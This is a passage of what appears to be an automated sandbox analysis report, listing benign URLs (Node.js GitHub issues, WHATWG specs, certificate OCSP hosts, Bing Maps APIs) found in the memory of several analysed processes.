                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1755984216.0000000001595000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.2381772054.0000000001599000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.0000000001593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://o.pki.goog/s/we1/ynA0%
                      Source: RtkAudUService64a.exe, 00000040.00000002.2496546660.000001FE48C69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.cloudflare.com/origin_ca
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1530677617.0000000003D18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1530677617.0000000003D18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://src.chromium.org/viewvc/blink/trunk/Source/devtools/front_end/SourceMap.js
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://userguide.icu-project.org/strings/properties
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.3waylabs.com/nw/WWW/products/wizcon/vt220.html
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: svchost.exe, 00000001.00000002.1366639411.000001A164E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.midnight-commander.org/browser/lib/tty/key.c
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.squid-cache.org/Doc/config/half_closed_clients/
                      Source: Launcher.exe, 00000000.00000000.1238969388.0000000002946000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.unicode.org/copyright.html
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1530677617.0000000003D18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1530677617.0000000003D18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                      Source: svchost.exe, 00000001.00000003.1365833849.000001A164E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1562259858.00000000015D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1756162409.00000000015D7000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.2384478764.00000000015D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=10201
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=10704
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=745678
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://code.google.com/p/chromium/issues/detail?id=25916
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#clear
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#console-namespace
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#count
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#count-map
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#countreset
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#table
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1562259858.00000000015D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1756162409.00000000015D7000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.2384478764.00000000015D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://crbug.com/v8/7848
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://cs.chromium.org/chromium/src/v8/tools/SourceMap.js?rcl=dd10454c1d
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc7231#section-6.4
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc7238
                      Source: svchost.exe, 00000001.00000003.1365642107.000001A164E63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1366840961.000001A164E64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
                      Source: svchost.exe, 00000001.00000002.1366898639.000001A164E72000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1365833849.000001A164E5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1366764570.000001A164E44000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1365965883.000001A164E43000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1365642107.000001A164E63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1365912167.000001A164E5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1366080231.000001A164E67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1365510976.000001A164E70000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 00000001.00000002.1366898639.000001A164E72000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1365510976.000001A164E70000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 00000001.00000003.1365833849.000001A164E5A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                      Source: svchost.exe, 00000001.00000003.1365573628.000001A164E69000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1366864375.000001A164E6A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                      Source: svchost.exe, 00000001.00000002.1366898639.000001A164E72000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1365510976.000001A164E70000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
                      Source: svchost.exe, 00000001.00000003.1365833849.000001A164E5A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                      Source: svchost.exe, 00000001.00000002.1366687825.000001A164E2B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/webservices/v1/LoggingService/LoggingService.svc/Log?
                      Source: svchost.exe, 00000001.00000003.1365833849.000001A164E5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1365642107.000001A164E63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1365912167.000001A164E5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1366080231.000001A164E67000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 00000001.00000003.1365833849.000001A164E5A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                      Source: svchost.exe, 00000001.00000003.1365573628.000001A164E69000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1366864375.000001A164E6A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1366687825.000001A164E2B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                      Source: svchost.exe, 00000001.00000003.1365833849.000001A164E5A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                      Source: svchost.exe, 00000001.00000003.1365833849.000001A164E5A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                      Source: svchost.exe, 00000001.00000003.1365833849.000001A164E5A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                      Source: svchost.exe, 00000001.00000002.1366687825.000001A164E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1365642107.000001A164E63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1366080231.000001A164E67000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                      Source: svchost.exe, 00000001.00000002.1366764570.000001A164E44000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1365965883.000001A164E43000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                      Source: svchost.exe, 00000001.00000003.1365833849.000001A164E5A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                      Source: svchost.exe, 00000001.00000002.1366764570.000001A164E44000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1365965883.000001A164E43000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1365642107.000001A164E63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1366840961.000001A164E64000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://developer.mozilla.org/en-US/docs/SpiderMonkey/Parser_API
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/PerformanceResourceTiming
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Equality_comparisons_and_sameness#Loose_equa
                      Source: svchost.exe, 00000001.00000003.1366106338.000001A164E28000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditP
                      Source: svchost.exe, 00000001.00000003.1365466125.000001A164E51000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1366840961.000001A164E64000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                      Source: svchost.exe, 00000001.00000003.1365965883.000001A164E43000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 00000001.00000003.1365642107.000001A164E63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1366840961.000001A164E64000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 00000001.00000002.1366764570.000001A164E44000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1366687825.000001A164E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1365965883.000001A164E43000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
                      Source: svchost.exe, 00000001.00000002.1366840961.000001A164E64000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.t
                      Source: svchost.exe, 00000001.00000003.1365833849.000001A164E5A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                      Source: svchost.exe, 00000001.00000003.1265117155.000001A164E37000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/
                      Source: svchost.exe, 00000001.00000003.1365573628.000001A164E69000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1366864375.000001A164E6A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1366687825.000001A164E2B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://encoding.spec.whatwg.org
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://encoding.spec.whatwg.org/#textdecoder
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://encoding.spec.whatwg.org/#textencoder
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://esdiscuss.org/topic/isconstructor#content-11
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://fetch.spec.whatwg.org/
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://fetch.spec.whatwg.org/#fetch-timing-info
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://gist.github.com/XVilka/8346728#gistcomment-2823421
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/WICG/scheduling-apis
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/WebAssembly/esm-integration/issues/42
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/acornjs/acorn/blob/master/acorn/src/identifier.js#L23
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/acornjs/acorn/issues/575
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/addaleax/eventemitter-asyncresource
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/antirez/linenoise
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/chalk/ansi-regex/blob/HEAD/index.js
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/chalk/supports-color
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/chromium/chromium/blob/HEAD/third_party/blink/public/platform/web_crypto_algorith
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/da-x/rxvt-unicode/tree/v9.22-with-24bit-color
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/estree/estree/blob/a27003adf4fd7bfad44de9cef372a2eacd527b1c/es5.md#regexpliteral
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/repairES5.js
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/startSES.js
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/google/closure-compiler/wiki/Source-Maps
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/heycam/webidl/pull/946.
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/isaacs/color-support.
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/joyent/node/issues/3295.
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/libuv/libuv/pull/1501.
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/mafintosh/end-of-stream
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/mafintosh/pump
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/mysticatea/abort-controller
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/nodejs/node-v0.x-archive/issues/2876.
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/nodejs/node/commit/ec2822adaad76b126b5cccdeaa1addf2376c9aa6
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/nodejs/node/commit/f7620fb96d339f704932f9bb9a0dceb9952df2d4
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/nodejs/node/issues
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/nodejs/node/issues/10673
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/nodejs/node/issues/13435
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/nodejs/node/issues/19009
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/nodejs/node/issues/2006
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/nodejs/node/issues/2119
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/nodejs/node/issues/31074
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/nodejs/node/issues/3392
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/nodejs/node/issues/34532
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/nodejs/node/issues/35475
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/nodejs/node/issues/35862
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/nodejs/node/issues/35981
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/nodejs/node/issues/39707
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/nodejs/node/issues/39758
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/nodejs/node/pull/12342
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/nodejs/node/pull/12607
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/nodejs/node/pull/13870#discussion_r124515293
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/nodejs/node/pull/1771#issuecomment-119351671
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/nodejs/node/pull/21313
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/nodejs/node/pull/26334.
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/nodejs/node/pull/30380#issuecomment-552948364
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/nodejs/node/pull/30958
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/nodejs/node/pull/32887
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/nodejs/node/pull/33515.
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/nodejs/node/pull/33661
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/nodejs/node/pull/3394
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/nodejs/node/pull/34010
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/nodejs/node/pull/34103#issuecomment-652002364
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/nodejs/node/pull/34375
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/nodejs/node/pull/34385
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/nodejs/node/pull/35941
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/nodejs/node/pull/35949#issuecomment-722496598
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/nodejs/node/pull/36061#discussion_r533718029
